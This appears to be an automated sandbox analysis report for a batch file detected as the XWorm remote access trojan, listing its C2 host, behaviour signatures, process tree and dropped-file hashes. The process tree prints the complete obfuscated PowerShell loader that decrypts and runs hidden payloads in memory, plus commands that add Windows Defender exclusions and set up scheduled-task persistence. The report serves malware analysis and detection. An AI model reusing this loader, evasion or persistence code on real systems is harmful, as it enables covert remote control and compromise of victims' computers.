Analysis

  • max time kernel
    27s
  • max time network
    29s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240508-en
  • resource tags

    arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    31-05-2024 11:44

General

  • Target

    APK_Installer.bat

  • Size

    302KB

  • MD5

    7a5f5944302b8298714b56ae2f138b7c

  • SHA1

    669b42f2f6e76895899d84d5ad7a12f23d951f13

  • SHA256

    3f5e7ecf09b373256a2765700ae45c9edc070a1699893a3fd11af4cda4683552

  • SHA512

    73049c86a87fe41797a4f3b382e0f2740a9def19ee12979d7a37237b33fa5aa3ad2ec1c4852ebc02987afa75f08fd52115d4a416eabf38b5df1936ce38b8f120

  • SSDEEP

    6144:32i9XCwjujllYECVvYOjntEw8ZNsT0oilQHSzlO8DF8hVvRj:32iBCwyhCVlaJZUilQHulOq2vRj

Malware Config

Extracted

Family

xworm

C2

19.ip.gl.ply.gg:38173

Attributes
  • Install_directory

    %Userprofile%

  • install_file

    Runtime Broker.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell and hide display window.

  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3020
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\APK_Installer.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1116
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_23_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_23.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1132
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_23.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2144
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_23.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2296
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JtEG91HadDOug1ikw4ED5Ft1+v0q/aQ1W+w0T1fq7bU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dK/r26SLdFIerecbjeR5Zw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $sRhXB=New-Object System.IO.MemoryStream(,$param_var); $WaKyX=New-Object System.IO.MemoryStream; $KkhnQ=New-Object System.IO.Compression.GZipStream($sRhXB, [IO.Compression.CompressionMode]::Decompress); $KkhnQ.CopyTo($WaKyX); $KkhnQ.Dispose(); $sRhXB.Dispose(); $WaKyX.Dispose(); $WaKyX.ToArray();}function execute_function($param_var,$param2_var){ $HiXkA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GEGne=$HiXkA.EntryPoint; $GEGne.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_23.bat';$gMRjN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_23.bat').Split([Environment]::NewLine);foreach ($wPRor in $gMRjN) { if ($wPRor.StartsWith(':: ')) { $MmaAY=$wPRor.Substring(3); break; }}$payloads_var=[string[]]$MmaAY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops startup file
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4356
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4092
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1176
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Runtime Broker.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1064
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Runtime Broker.exe'
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1748
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Admin\Runtime Broker.exe"
              6⤵
              • Creates scheduled task(s)
              PID:3108
  • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
    "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:2304

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    df472dcddb36aa24247f8c8d8a517bd7

    SHA1

    6f54967355e507294cbc86662a6fbeedac9d7030

    SHA256

    e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

    SHA512

    06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    59d37a8c588c83e806678c7fb5d1229f

    SHA1

    4396d68567f30f08e08a269802fe3f4784b88c5b

    SHA256

    c1af181e4703177ae1c55f2160c6b7685f3536da35a1501e4a70e25155519e84

    SHA512

    19223db6932776bdfcd8202a8ca19e60deacacdc6e44f2f219b541b4e2eadb82c7c819512f17c76f9ca177ca89452adbebf30dceef9fcc05085472ff49ea8dc2

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    2ab9885ed803576dfcb4df976a3e7ca0

    SHA1

    49a54d1bb797dca76c41f6af288f9df6c705cf56

    SHA256

    9a7f8ca5a6bfcd5839a1cd029a116378bec3be1baec9db19bbe4f127199fb322

    SHA512

    b1f90e17c21425cd94a7f00438386ae40c7414784a96694432e340e35ba6a60e1176a2871a732474db4bd7080ebdbf4c476b61efa49fedf8208b382252ae25ba

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    4ae54c3a00d1d664f74bfd4f70c85332

    SHA1

    67f3ed7aaea35153326c1f907c0334feef08484c

    SHA256

    1e56a98f74d4a604bef716b47ef730d88f93aec57a98c89aa4423394cbc95b5c

    SHA512

    b3bbdefeaadbdaac00f23ce3389bbd3b565bd7e0079aeebf3e4afba892382e1cd3896c00bb2e5a98146ac593f9bdc5568d0bd08c5b0139f0814b1a38911c3889

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    944B

    MD5

    8b1394bd98c93d68bb4151a8c8c4015b

    SHA1

    3c5695c58a2186c1a13e70d8de9343f660429a91

    SHA256

    3d46aa2ace9880ec7c1eb00581078beb3ca2107f343654aa5d5e250c97bf67d8

    SHA512

    b7fe198d72b322dd2b2badf038821af9ceccae8b506f7475d8c253ea40aef9b0ba50dae223d5251d72a14aec81d025d394d3277576125d03f3e4ec393459a607

  • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

    Filesize

    11KB

    MD5

    cd56e155edf53e5728c46b6c9eb9c413

    SHA1

    14b1b0f090803c9ee39797aed4af13dc7849566d

    SHA256

    70a6cf268c013fb4d907bedc12af3e5f802f179f0cc8353c7b8227dde840d31a

    SHA512

    a4ada455d44a89fd2baa505aa9266b70913967b839522ef5da8d7afd31af6662c3ad96ac3e3531d82a72be7d019c9d88f1ce391c5b5fa0e4422a634c51491165

  • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat

    Filesize

    11KB

    MD5

    3569ff1aa5310102ef02c312ca4dbe9a

    SHA1

    4124b1e805d5c487bf86182d19ed22bed6cf44ac

    SHA256

    3ce1168408eb889f65cd4d45c12c58842a4291356c835cfb1877d017b6768a9b

    SHA512

    c966ebf69abce51aa4fbec1e53f43485786cbeb5fb6cea18eb3407b7d4c7a212a6843b69965de9f577c483c6139840d0f7fe56d69fc8c97e6b0884b75b7aed8d

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nnust4mz.n2n.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\startup_str_23.bat

    Filesize

    302KB

    MD5

    7a5f5944302b8298714b56ae2f138b7c

    SHA1

    669b42f2f6e76895899d84d5ad7a12f23d951f13

    SHA256

    3f5e7ecf09b373256a2765700ae45c9edc070a1699893a3fd11af4cda4683552

    SHA512

    73049c86a87fe41797a4f3b382e0f2740a9def19ee12979d7a37237b33fa5aa3ad2ec1c4852ebc02987afa75f08fd52115d4a416eabf38b5df1936ce38b8f120

  • C:\Users\Admin\AppData\Roaming\startup_str_23.vbs

    Filesize

    114B

    MD5

    b5d435d40e89e0e13014958be34193f2

    SHA1

    cccbb0d88f55ce2000033ceb56b0b866e5eb1ff6

    SHA256

    4d246b9a3e28a38de80c1cb1fe8d5cfe67ba72964f18b167afd84b74bfe1e10a

    SHA512

    0984e0a24e3309cc8302dee1ee2a491859918aade428364c0b3f1034103273b683a4bc9ff2368f0a00e0a06812e64702317691fd20077423acd7b779b321924f

  • memory/1116-13-0x00000270EB8B0000-0x00000270EB8B8000-memory.dmp

    Filesize

    32KB

  • memory/1116-12-0x00007FF829260000-0x00007FF829D22000-memory.dmp

    Filesize

    10.8MB

  • memory/1116-111-0x00007FF829263000-0x00007FF829265000-memory.dmp

    Filesize

    8KB

  • memory/1116-110-0x00007FF829260000-0x00007FF829D22000-memory.dmp

    Filesize

    10.8MB

  • memory/1116-3-0x00000270EB880000-0x00000270EB8A2000-memory.dmp

    Filesize

    136KB

  • memory/1116-10-0x00007FF829260000-0x00007FF829D22000-memory.dmp

    Filesize

    10.8MB

  • memory/1116-14-0x00000270EBB10000-0x00000270EBB4A000-memory.dmp

    Filesize

    232KB

  • memory/1116-11-0x00007FF829260000-0x00007FF829D22000-memory.dmp

    Filesize

    10.8MB

  • memory/1116-0-0x00007FF829263000-0x00007FF829265000-memory.dmp

    Filesize

    8KB

  • memory/1132-25-0x00007FF829260000-0x00007FF829D22000-memory.dmp

    Filesize

    10.8MB

  • memory/1132-16-0x00007FF829260000-0x00007FF829D22000-memory.dmp

    Filesize

    10.8MB

  • memory/1132-27-0x00007FF829260000-0x00007FF829D22000-memory.dmp

    Filesize

    10.8MB

  • memory/1132-26-0x00007FF829260000-0x00007FF829D22000-memory.dmp

    Filesize

    10.8MB

  • memory/1132-30-0x00007FF829260000-0x00007FF829D22000-memory.dmp

    Filesize

    10.8MB

  • memory/4356-48-0x000001FB27F90000-0x000001FB27FAA000-memory.dmp

    Filesize

    104KB